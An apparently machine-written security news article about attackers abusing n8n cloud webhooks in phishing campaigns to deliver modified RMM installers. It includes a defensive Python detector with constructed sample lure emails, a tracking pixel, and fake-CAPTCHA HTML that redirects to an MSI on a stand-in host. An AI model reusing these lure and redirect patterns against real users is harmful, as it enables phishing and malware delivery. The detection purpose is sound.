Ethical Hacking News
A recent report by Cisco Talos has revealed that threat actors have been abusing the n8n workflow automation platform since October 2025 to deliver malicious payloads via phishing emails. The campaigns abuse a legitimate feature, the platform's URL-exposed webhooks, which have been turning up in phishing emails with increasing frequency.
Because the webhook URLs sit on a domain that mail filters already trust, the technique lets attackers slip past traditional security controls and turn a productivity tool into a delivery vehicle for persistent remote access. According to Cisco Talos, the volume of email messages containing these URLs was about 686% higher than in January 2025.
As low-code automation spreads, it is crucial to recognize abuse patterns like this one before they are exploited at scale. Security teams need to ensure that these platforms and tools remain assets rather than liabilities.
Threat actors have weaponized the n8n workflow automation platform to run phishing campaigns that deliver malicious payloads or fingerprint recipients' devices via automated emails. According to Cisco Talos, the activity dates back to at least October 2025. The phishing emails carry links to n8n-hosted webhooks; because those URLs live under n8n's own cloud domain they pass traditional security filters, and the pages they serve lead to installers that give the attackers persistent remote access.
n8n is a popular workflow automation platform with artificial intelligence (AI) features that lets users connect web applications, APIs, and AI model services to sync data, build agentic systems, and run repetitive rule-based tasks. Users can sign up for a free developer account on the managed cloud-hosted service and run automation workflows without having to set up their own infrastructure.
The platform lets users create webhooks that receive data from apps and services when certain events fire, so that a workflow starts as soon as the data arrives. Each webhook has a unique URL, and on the cloud service that URL is exposed under a *.app.n8n[.]cloud subdomain.
Threat actors have been abusing these URL-exposed webhooks in phishing attacks since at least October 2025. The emails contain links under the same *.app.n8n[.]cloud domain, which lends them an air of legitimacy; the links lead to malicious payloads or load tracking pixels that confirm which recipient email addresses are live.
When the recipient opens the email and clicks the link, the browser itself becomes the webhook's "receiving application": whatever the workflow returns as its HTTP response is rendered as a web page. Through such pages the threat actors deliver executable files or MSI installers that serve as conduits for modified versions of legitimate Remote Monitoring and Management (RMM) tools such as Datto and ITarian Endpoint Management.
The end goal is persistent access: once installed, the RMM tool connects out to an attacker-controlled command-and-control (C2) server. The technique bypasses traditional security filters precisely because the first hop is a trusted productivity tool rather than attacker infrastructure.
Cisco Talos attributes the technique's success to the webhook URLs themselves: anyone with a free account can create one, and it resolves under a domain that organizations already trust, so the malware delivery keeps a veneer of legitimacy.
The volume of email messages containing these URLs in March 2026 was about 686% higher than in January 2025. The campaign Talos observed used emails that claimed to share a document and embedded n8n-hosted webhook links; following a link landed the victim on a page that presented a CAPTCHA.
Completing the CAPTCHA triggered the download of a malicious payload from an external host. Because the download was initiated by JavaScript embedded in the page served from the n8n domain, it appeared to the victim to come from n8n itself. The technique shows how readily a flexible, easily integrated automation platform can be repurposed for malicious ends.
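As an added example (not code from the Talos report or from n8n), the following Python sketches the two checks a mail-security or SOC engineer would want from the description above: spotting n8n cloud webhook URLs in message bodies, and, for a page such a link returns, pulling out the external download that the embedded JavaScript points to. The sample emails, the landing-page HTML, the host names, webhook IDs and file names are all constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample inputs for this example (not data from the Talos report).
# Host names, the webhook IDs and file names are made up.
EMAIL_BODIES = [
    # Shared-document lure with an n8n cloud webhook link
    "A document has been shared with you. Open it here: "
    "https://acme-docs.app.n8n.cloud/webhook/3f2c1a9e-0b7d-4d6e-9a3c-1234567890ab?u=bob%40example.com",
    # HTML mail with a 1x1 tracking pixel fetched from an n8n webhook
    '<p>Invoice attached.</p><img src="https://ping.app.n8n.cloud/webhook/7d1e2b3c-pixel?e=bob%40example.com" width="1" height="1">',
    # Benign mail with a URL on an ordinary domain
    "Quarterly report is at https://www.example.org/reports/q1 - Finance",
]

# Constructed HTML as a webhook might return it: a fake CAPTCHA whose click handler
# sends the browser to an MSI on an external host (the pattern described above).
LANDING_PAGE_HTML = """<html><body>
<h2>Verify you are human</h2>
<button id="captcha">I'm not a robot</button>
<script>
document.getElementById('captcha').onclick = function () {
  window.location = 'https://cdn-updates.example.net/files/SharedDocument.msi';
};
</script>
</body></html>"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Only hosts that END with app.n8n.cloud; a look-alike such as
# app.n8n.cloud.attacker.example must not match.
N8N_CLOUD_HOST = re.compile(r"(^|\.)app\.n8n\.cloud$")
WEBHOOK_PATHS = ("/webhook/", "/webhook-test/")
# Assumed list of payload extensions worth flagging; tune for your environment.
PAYLOAD_EXT = (".exe", ".msi", ".zip", ".js", ".hta", ".lnk")


def is_n8n_webhook(url):
    """True if url points at a webhook endpoint on the n8n cloud service."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    return bool(N8N_CLOUD_HOST.search(host)) and p.path.startswith(WEBHOOK_PATHS)


def extract_urls(text):
    """Pull http(s) URLs out of plain-text or HTML mail, trimming trailing punctuation."""
    return [u.rstrip(".,;:)") for u in URL_RE.findall(text)]


def flag_email(body):
    """Return the n8n cloud webhook URLs found in one email body (empty list if clean)."""
    return [u for u in extract_urls(body) if is_n8n_webhook(u)]


def external_downloads(html, page_host):
    """Return URLs inside <script> blocks that leave page_host and end in a payload extension.

    Second-stage check: the n8n page is not the payload; the JavaScript it
    carries points the browser at an external host for the installer.
    """
    hits = []
    for script in re.findall(r"<script[^>]*>(.*?)</script>", html, flags=re.S | re.I):
        for u in extract_urls(script):
            p = urlparse(u)
            host = (p.hostname or "").lower()
            if host and host != page_host.lower() and p.path.lower().endswith(PAYLOAD_EXT):
                hits.append(u)
    return hits


def triage(body):
    """Classify one message: 'suspicious' when it carries an n8n webhook link."""
    hits = flag_email(body)
    return {"verdict": "suspicious" if hits else "clean", "webhook_urls": hits}


if __name__ == "__main__":
    for body in EMAIL_BODIES:
        print(triage(body))
    print(external_downloads(LANDING_PAGE_HTML, "acme-docs.app.n8n.cloud"))
```

Matching on the host suffix rather than on a substring matters: an attacker can register something like app.n8n.cloud.attacker.example, and the check above rejects it. The /webhook/ and /webhook-test/ prefixes are n8n's production and test webhook paths; a bare n8n cloud subdomain with no webhook path is not flagged, since the signal here is the webhook endpoint, not the vendor's domain.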
In conclusion, the abuse of the n8n workflow automation platform for phishing and payload delivery is a reminder that a trusted SaaS domain is not a trust signal when anyone can register a free account and publish arbitrary content under it. Security teams that treat such platforms as assets rather than liabilities will need to inspect what a link serves, not only where it is hosted, and to watch for the RMM installers and C2 connections that follow.
Related Information:
https://www.ethicalhackingnews.com/articles/N8n-Workflow-Automation-Platform-Compromised-for-Malicious-Phishing-Campaigns-ehn.shtml
https://thehackernews.com/2026/04/n8n-webhooks-abused-since-october-2025.html
https://blog.talosintelligence.com/the-n8n-n8mare/
Published: Wed Apr 15 14:09:59 2026 by llama3.2 3B Q4_K_M